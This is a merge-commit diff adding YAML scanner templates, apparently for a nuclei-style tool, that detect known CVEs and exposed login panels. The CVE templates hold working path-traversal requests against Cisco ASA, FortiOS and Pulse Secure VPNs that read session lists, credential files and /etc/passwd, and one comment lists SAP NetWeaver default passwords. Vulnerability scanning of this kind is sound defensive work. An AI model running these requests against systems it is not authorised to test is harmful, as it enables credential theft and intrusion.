Merge pull request #44 from organiccrap/master

pending pull - some easy to detect cve & panels

cves/CVE-2018-0296.yaml

@@ -0,0 +1,22 @@
+id: CVE-2018-0296
+
+info:
+  name: Cisco ASA path traversal vulnerability
+  author: organiccrap
+  severity: medium
+  # https://github.com/yassineaboukir/CVE-2018-0296
+  # curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
+  # if vuln, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
+    matchers:
+      - type: word
+        words:
+            - "///sessions"
+        part: body
+      - type: status
+        status:
+          - 200

cves/CVE-2018-13379.yaml

@@ -0,0 +1,15 @@
+id: CVE-2018-13379
+
+info:
+  name: FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
+  author: organiccrap
+  severity: high
+
+requests:
+  - method: GET
+    path: 
+      - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+    matchers:
+      - type: word
+        words: 
+          - "var fgt_lang ="

cves/CVE-2019-11510.yaml

@@ -0,0 +1,20 @@
+id: CVE-2019-11510
+
+info:
+  name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
+  author: organiccrap
+  severity: high
+  # https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
+  
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
+    matchers:
+      - type: status
+        status:
+            - 200
+      - type: regex
+        regex:
+            - "root:[x*]:0:0:"
+        part: body

files/firebase-detect.yaml

@@ -0,0 +1,17 @@
+id: firebase-detect
+
+info:
+  name: firebase detect
+  author: organiccrap
+  severity: low
+  # http://ghostlulz.com/google-exposed-firebase-database/
+  
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
+    matchers:
+      - type: word
+        words:
+            - "Could not parse auth token"
+        part: body

panels/cisco-asa-panel.yaml

@@ -0,0 +1,16 @@
+id: cisco-asa-panel-detect
+
+info:
+  name: Cisco ASA VPN panel detect
+  author: organiccrap
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/+CSCOE+/logon.html"
+    matchers:
+      - type: word
+        words:
+            - "<title>SSL VPN Service</title>"
+        part: body

panels/grafana-detect.yaml

@@ -0,0 +1,16 @@
+id: grafana-detect
+
+info:
+  name: Grafana panel detect
+  author: organiccrap
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+    matchers:
+      - type: word
+        words:
+            - "<title>Grafana</title>"
+        part: body

panels/sap-netweaver-detect.yaml

@@ -0,0 +1,17 @@
+id: sap-netweaver-portal-detect
+
+info:
+  name: SAP NetWeaver Portal detect
+  author: organiccrap
+  severity: low
+  # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/irj/portal"
+    matchers:
+      - type: word
+        words:
+            - "<title>SAP&#x20;NetWeaver&#x20;Portal</title>"
+        part: body

panels/supervpn-panel.yaml

@@ -0,0 +1,16 @@
+id: supervpn-detect
+
+info:
+  name: SuperVPN panel detect
+  author: organiccrap
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/login.html"
+    matchers:
+      - type: word
+        words:
+            - "<title>Sign In-SuperVPN</title>"
+        part: body